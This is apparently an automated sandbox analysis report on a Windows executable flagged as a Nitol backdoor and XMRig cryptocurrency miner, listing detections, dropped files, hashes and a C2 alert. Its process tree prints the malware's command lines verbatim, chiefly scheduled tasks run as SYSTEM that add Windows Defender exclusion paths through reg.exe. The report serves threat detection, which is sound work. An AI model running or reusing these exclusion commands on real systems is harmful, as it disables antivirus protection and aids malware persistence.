Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2976587-987347589.07.exe

Overview

General Information

Sample name:2976587-987347589.07.exe
Analysis ID:1588710
MD5:67ab54b4fc69f4175d217dd57154a27c
SHA1:f753d5cf1dde05bd2b3417ddfcd12306219fdef3
SHA256:898349755ad447054ca99dc779c1f5b6c1dd4a7c0dcf1dda1d0e8bbaa6406b36
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Drops password protected ZIP file
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2976587-987347589.07.exe (PID: 1824 cmdline: "C:\Users\user\Desktop\2976587-987347589.07.exe" MD5: 67AB54B4FC69F4175D217DD57154A27C)
  • l0tiFM.exe (PID: 6756 cmdline: C:\Users\user\Documents\l0tiFM.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • l0tiFM.exe (PID: 4064 cmdline: C:\Users\user\Documents\l0tiFM.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 4584 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5896 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3504 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5784 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1508 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1656 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2232 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4256 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5700 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5252 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5928 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6164 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6280 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1376 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2912 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3656 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • DfP1K3.exe (PID: 7124 cmdline: "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 6056 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6528 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5256 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6992 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5832 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2840 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6464 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6384 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5980 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • DfP1K3.exe (PID: 4472 cmdline: "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Rpe5Ig0.exe (PID: 5420 cmdline: "C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DfP1K3.exe (PID: 1308 cmdline: "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 53jGFr5v.exe (PID: 2140 cmdline: C:\ProgramData\53jGFr5v.exe MD5: C12239FE6BC555339AA48D933FC376D2)
  • lBoqoqIC.exe (PID: 916 cmdline: C:\ProgramData\efk2JUeS\lBoqoqIC.exe MD5: AA990DC3875790615E8CB024A78E9F9C)
  • Rpe5Ig0.exe (PID: 2388 cmdline: "C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DfP1K3.exe (PID: 2076 cmdline: "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • d0oKoK2T.exe (PID: 5952 cmdline: C:\ProgramData\atBs3ba9\d0oKoK2T.exe 1776 MD5: 147936E67DBDD86961409FE7D5821DA6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
    0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: DfP1K3.exe PID: 7124JoeSecurity_NitolYara detected NitolJoe Security
          Process Memory Space: DfP1K3.exe PID: 7124PlugXStringsPlugX Identifying StringsSeth Hardy
          • 0x857b5:$Dwork: d:\work
          • 0xab33b:$Dwork: d:\work
          • 0x13bbc7:$Dwork: d:\work
          • 0xcf4f8:$Shell6: Shell6
          • 0xd02d7:$Shell6: Shell6
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          42.2.DfP1K3.exe.3a503e8.7.unpackJoeSecurity_NitolYara detected NitolJoe Security
            42.2.DfP1K3.exe.3a503e8.7.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
              42.2.DfP1K3.exe.10000000.8.unpackJoeSecurity_NitolYara detected NitolJoe Security
                6.2.l0tiFM.exe.2800000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
                • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
                • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
                • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
                42.2.DfP1K3.exe.32a0000.6.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                • 0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths
                • 0x2225b:$e2: Add-MpPreference -ExclusionPath
                Click to see the 1 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\l0tiFM.exe, ParentImage: C:\Users\user\Documents\l0tiFM.exe, ParentProcessId: 4064, ParentProcessName: l0tiFM.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4584, ProcessName: cmd.exe
                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\l0tiFM.exe, ParentImage: C:\Users\user\Documents\l0tiFM.exe, ParentProcessId: 4064, ParentProcessName: l0tiFM.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4584, ProcessName: cmd.exe
                Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
                Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6528, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 5256, ProcessName: reg.exe
                Sigma detected: Windows Defender Exclusions Added - Registry
                Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5256, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T04:43:28.898619+010028529011Malware Command and Control Activity Detected192.168.2.8499888.210.66.1838917TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\ProgramData\53jGFr5v.exeAvira: detection malicious, Label: HEUR/AGEN.1315326
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeAvira: detection malicious, Label: HEUR/AGEN.1314683
                Source: C:\Program Files (x86)\DfP1K3\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
                Source: C:\Program Files (x86)\3q7mMte5\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
                Multi AV Scanner detection for submitted file
                Source: 2976587-987347589.07.exeVirustotal: Detection: 15%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\ProgramData\53jGFr5v.exeJoe Sandbox ML: detected
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\DfP1K3\tbcore3U.dllJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\3q7mMte5\tbcore3U.dllJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Yara detected Xmrig cryptocurrency miner
                Source: Yara matchFile source: 52.2.d0oKoK2T.exe.7ff721f20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: d0oKoK2T.exe PID: 5952, type: MEMORYSTR
                Found strings related to Crypto-Mining
                Source: d0oKoK2T.exe, 00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmpString found in binary or memory: stratum+tcp://
                Source: d0oKoK2T.exe, 00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmpString found in binary or memory: stratum+tcp://

                Compliance

                barindex
                Detected unpacking (creates a PE file in dynamic memory)
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeUnpacked PE file: 42.2.DfP1K3.exe.2820000.3.unpack
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeUnpacked PE file: 42.2.DfP1K3.exe.2880000.4.unpack
                Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.8:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.8:49990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.8:49994 version: TLS 1.2
                Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.07.exe
                Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003D32000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000000.2572435110.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002A.00000002.3349223878.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002A.00000002.3348166976.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002B.00000002.2616189489.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002B.00000000.2599264601.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, Rpe5Ig0.exe, 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, Rpe5Ig0.exe, 0000002C.00000000.2603212393.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, DfP1K3.exe, 0000002F.00000000.2618205476.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002F.00000002.2626427555.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, Rpe5Ig0.exe, 00000032.00000000.2963141398.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, Rpe5Ig0.exe, 00000032.00000002.2970406917.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, DfP1K3.exe, 00000033.00000002.2976452072.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 00000033.00000000.2969401115.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
                Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: l0tiFM.exe, 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe, 00000006.00000000.2094593290.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe, 00000007.00000000.2117625090.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe.0.dr

                Change of critical system settings

                barindex
                Adds extensions / path to Windows Defender exclusion list (Registry)
                Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
                Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
                Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
                Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
